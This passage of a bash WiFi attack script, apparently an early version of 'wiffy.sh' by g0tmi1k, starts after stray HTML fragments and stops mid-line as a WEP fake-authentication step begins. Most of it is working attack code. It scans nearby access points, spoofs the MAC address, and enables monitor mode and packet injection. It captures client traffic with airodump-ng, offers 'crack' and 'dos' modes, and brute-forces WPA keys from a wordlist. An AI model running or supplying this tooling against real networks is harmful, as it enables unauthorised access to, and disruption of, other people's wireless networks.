<\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action 